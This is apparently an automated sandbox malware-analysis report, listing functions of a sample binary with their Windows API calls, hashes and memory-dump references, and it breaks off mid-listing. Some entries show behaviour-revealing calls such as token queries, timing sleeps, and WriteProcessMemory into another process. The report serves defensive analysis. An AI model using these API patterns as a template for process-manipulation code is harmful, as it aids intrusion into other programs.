                                                                                                                                                  • Instruction Fuzzy Hash: 95218C70904308EBDB119F68DD4CB6D7BE8EB02362F24479AE825B61E1E774DC91CB94
                                                                                                                                                  Function 00C1C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memcmp
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2931989736-0
                                                                                                                                                  • Opcode ID: 1b491a23f924a9a8171736c6cae74c85eb9461232a0ff4c8902afeed1bf1fff1
                                                                                                                                                  • Instruction ID: f9906bca4ef14f190fa7abe49546fde877b845c4c49c2ab79de792bdddd8ea0f
                                                                                                                                                  • Opcode Fuzzy Hash: 1b491a23f924a9a8171736c6cae74c85eb9461232a0ff4c8902afeed1bf1fff1
                                                                                                                                                  • Instruction Fuzzy Hash: FF01F572A802457FF20061169CC2FFBB35C9A62788F148535FE1696382E760EF95A2E4
                                                                                                                                                  Function 00C2504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C25075
                                                                                                                                                  • __beginthreadex.LIBCMT ref: 00C25093
                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00C250A8
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C250BE
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C250C5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3824534824-0
                                                                                                                                                  • Opcode ID: a2e31b461194d6a4c40c41895898f3bcaf5c17090ff4a6082df43164ed0b275c
                                                                                                                                                  • Instruction ID: efab7c1eadc3077491773763d711829382c38873682b6e85646a351069a0a023
                                                                                                                                                  • Opcode Fuzzy Hash: a2e31b461194d6a4c40c41895898f3bcaf5c17090ff4a6082df43164ed0b275c
                                                                                                                                                  • Instruction Fuzzy Hash: 5511087A908759FBC7018BA8AC44BAF7BACEB45321F240366F824E3351D671894087F1
                                                                                                                                                  Function 00C18E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,00C18900,?,?,?), ref: 00C18E3C
                                                                                                                                                  • GetLastError.KERNEL32(?,00C18900,?,?,?), ref: 00C18E46
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00C18900,?,?,?), ref: 00C18E55
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00C18900,?,?,?), ref: 00C18E5C
                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,00C18900,?,?,?), ref: 00C18E73
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 842720411-0
                                                                                                                                                  • Opcode ID: 28fc341ae43e9ddb1ae5c5e8167ffc3179020879c93b6f4b299752d505f473ba
                                                                                                                                                  • Instruction ID: 9df1cd5bb33ebdd23a531570fce69a95846cdebc827057ee66925b3a87f5f7f4
                                                                                                                                                  • Opcode Fuzzy Hash: 28fc341ae43e9ddb1ae5c5e8167ffc3179020879c93b6f4b299752d505f473ba
                                                                                                                                                  • Instruction Fuzzy Hash: 17016D79200304BFDB204FA5DC48EAF7FADEF8A356B600529FC49D2220DA319D94DA60
                                                                                                                                                  Function 00C257FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C2581B
                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C25829
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25831
                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C2583B
                                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C25877
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                  • Opcode ID: b06bbebc324350ded4ac2a9a0ead16d0db5ae330e7c042da5fe07d4ec85844c0
                                                                                                                                                  • Instruction ID: 5e3d57d2e70c7899824b95b20fddffb15133c6a08d020b52a44526d2bd548b82
                                                                                                                                                  • Opcode Fuzzy Hash: b06bbebc324350ded4ac2a9a0ead16d0db5ae330e7c042da5fe07d4ec85844c0
                                                                                                                                                  • Instruction Fuzzy Hash: 66015B39C41A2D9BCF009FE5EC48AEEBBB8BB08712F104155E901F2180DB709590CBA2
                                                                                                                                                  Function 00C18CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C18CDE
                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C18CE8
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C18CF7
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C18CFE
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C18D14
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                  • Opcode ID: 319657eee417a73e96dbdb3071566bda81724a17a9518c89a9be22528e86e13c
                                                                                                                                                  • Instruction ID: d19162e4f53b8d25145716fdba53eec5e3117f80a01f5c2fdc4e230df74fe176
                                                                                                                                                  • Opcode Fuzzy Hash: 319657eee417a73e96dbdb3071566bda81724a17a9518c89a9be22528e86e13c
                                                                                                                                                  • Instruction Fuzzy Hash: 46F0A438204305AFDF101FB4AC88FAF3B6DEF8A756B204015F904D2190CA609C84EB60
                                                                                                                                                  Function 00C18D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C18D3F
                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C18D49
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18D58
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18D5F
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18D75
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                  • Opcode ID: 383f77906325f37b42dc6aaec814aa6f75a43c7e0665c7959a38774a6caca426
                                                                                                                                                  • Instruction ID: 6a80ad1efbc42fa349959c6d537a0f9f2fc00d08bbc2c0657bf2df7811a3cfd0
                                                                                                                                                  • Opcode Fuzzy Hash: 383f77906325f37b42dc6aaec814aa6f75a43c7e0665c7959a38774a6caca426
                                                                                                                                                  • Instruction Fuzzy Hash: D6F0A434204305AFDB111F64EC88FAF3B6CEF86756F640115F944D2190CB609E84EB60
                                                                                                                                                  Function 00C1CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C1CD90
                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C1CDA7
                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00C1CDBF
                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00C1CDDB
                                                                                                                                                  • EndDialog.USER32(?,00000001,?), ref: 00C1CDF5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                                  • Opcode ID: 8dc239decb458008aaabfdc0f7ee991551f8610cf170586b981acfe45b6dcf81
                                                                                                                                                  • Instruction ID: 431bba97cb0d708a83611c1512241cd73b52c8c8dccee1c81763a0960c7a2e6d
                                                                                                                                                  • Opcode Fuzzy Hash: 8dc239decb458008aaabfdc0f7ee991551f8610cf170586b981acfe45b6dcf81
                                                                                                                                                  • Instruction Fuzzy Hash: 2301DB74540704ABEB206B60EC9EBD67BB8FB01702F00066DF592B14D1DBF0A9D49B80
                                                                                                                                                  Function 00BC178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • EndPath.GDI32(?,?,00BFBBC9,00000000,?), ref: 00BC179B
                                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00BFBBC9,00000000,?), ref: 00BC17B7
                                                                                                                                                  • SelectObject.GDI32(?,00000000,?,00BFBBC9,00000000,?), ref: 00BC17CA
                                                                                                                                                  • DeleteObject.GDI32(?,00BFBBC9,00000000,?), ref: 00BC17DD
                                                                                                                                                  • StrokePath.GDI32(?,?,00BFBBC9,00000000,?), ref: 00BC17F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                                  • Opcode ID: c0ac6b6fd14db3eb8369957bbe675593b2977067825f97201793127ca8169600
                                                                                                                                                  • Instruction ID: 67646f63372eb4d8169021cfff4bea46462d0de546553390bbd7a55eb6e3053d
                                                                                                                                                  • Opcode Fuzzy Hash: c0ac6b6fd14db3eb8369957bbe675593b2977067825f97201793127ca8169600
                                                                                                                                                  • Instruction Fuzzy Hash: DCF0C470008708EBDB119F2AED4CB5D3BA4EB42366F248399E82AB51F1E7358D95DF14
                                                                                                                                                  Function 00C2C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CoInitialize.OLE32(00000000,00000001,00000000,00C50980), ref: 00C2CA75
                                                                                                                                                  • CoCreateInstance.OLE32(00C53D3C,00000000,00000001,00C53BAC,?), ref: 00C2CA8D
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                  • CoUninitialize.OLE32 ref: 00C2CCFA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                  • String ID: .lnk
                                                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                                                  • Opcode ID: 768db5209fd0f6f7db1d2ed9f0b793040094a27d8bab31bb0b78de3787e7247f
                                                                                                                                                  • Instruction ID: f7b45f1ed479636f05fc9e8be6fbbf812838dd106ceee610848889a061c21479
                                                                                                                                                  • Opcode Fuzzy Hash: 768db5209fd0f6f7db1d2ed9f0b793040094a27d8bab31bb0b78de3787e7247f
                                                                                                                                                  • Instruction Fuzzy Hash: DCA11971104205AFD300EF64C891EAFB7F8EF94754F00496DF5569B2A2EB70AE49CB92
                                                                                                                                                  Function 00BCE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE0FE6: std::exception::exception.LIBCMT ref: 00BE101C
                                                                                                                                                    • Part of subcall function 00BE0FE6: __CxxThrowException@8.LIBCMT ref: 00BE1031
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00BD1680: _memmove.LIBCMT ref: 00BD16DB
                                                                                                                                                  • __swprintf.LIBCMT ref: 00BCE598
                                                                                                                                                  Strings
                                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BCE431
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                                  • Opcode ID: 9ed2760b37eaf28602251728e2c7c671720920e9ac7d93e001dfe384604d774b
                                                                                                                                                  • Instruction ID: bd572678677e1d86d428a83a7e55fce7d9a1480b5a9db6fa53e2cb0d03004aa5
                                                                                                                                                  • Opcode Fuzzy Hash: 9ed2760b37eaf28602251728e2c7c671720920e9ac7d93e001dfe384604d774b
                                                                                                                                                  • Instruction Fuzzy Hash: 2C918E71518601AFC714EF28C895D6FB7E8EF95300F40499EF496972A1EB30EE44CB92
                                                                                                                                                  Function 00BE523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00BE52CD
                                                                                                                                                    • Part of subcall function 00BF0320: __87except.LIBCMT ref: 00BF035B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandling__87except__start
                                                                                                                                                  • String ID: pow
                                                                                                                                                  • API String ID: 2905807303-2276729525
                                                                                                                                                  • Opcode ID: d2160cf2dfa32c824bfa3d1d702d772e947efc7c0ea231de60685bfa1ab84ba6
                                                                                                                                                  • Instruction ID: 2e9afdff80aee1fc4f2737cd740230c9b7039ced579de22803839615bb23a443
                                                                                                                                                  • Opcode Fuzzy Hash: d2160cf2dfa32c824bfa3d1d702d772e947efc7c0ea231de60685bfa1ab84ba6
                                                                                                                                                  • Instruction Fuzzy Hash: 63518B6191964987CB217B16C94137E6BE0DB00755F2049D8E2C2872F7EF748CCCAA4A
                                                                                                                                                  Function 00BE0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: #$+
                                                                                                                                                  • API String ID: 0-2552117581
                                                                                                                                                  • Opcode ID: 505c339076d5a4e12e2377c7bb7e55a8dd796236e9403d83c398482c8b6c8b54
                                                                                                                                                  • Instruction ID: 31f674584145729cfe3730ad1a9fe50e04d70dadb75b10512ce407d4865e5e82
                                                                                                                                                  • Opcode Fuzzy Hash: 505c339076d5a4e12e2377c7bb7e55a8dd796236e9403d83c398482c8b6c8b54
                                                                                                                                                  • Instruction Fuzzy Hash: 8E512175500286DFEB11AF29C480AFA7BE0EF56310F144095ECA2AB2D0D734ADC2DB60
                                                                                                                                                  Function 00BDCF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$_memmove
                                                                                                                                                  • String ID: ERCP
                                                                                                                                                  • API String ID: 2532777613-1384759551
                                                                                                                                                  • Opcode ID: de631fed26fb590c4a83635803ceede228472d63a2c892d859f5d776bcbd994c
                                                                                                                                                  • Instruction ID: a74523ac3d1eb49e61bf8096d7ee2182352fd77161598d96fe4818f7637fb155
                                                                                                                                                  • Opcode Fuzzy Hash: de631fed26fb590c4a83635803ceede228472d63a2c892d859f5d776bcbd994c
                                                                                                                                                  • Instruction Fuzzy Hash: 3B51A3B1A0070A9BDB24CF65C8917EAFBE4EF44310F1485AFE98ADB251E7359685CB40
                                                                                                                                                  Function 00C1A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C21CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C19E4E,?,?,00000034,00000800,?,00000034), ref: 00C21CE5
                                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000,?,00000000,00000010,00000010,?,00000000), ref: 00C1A3F7
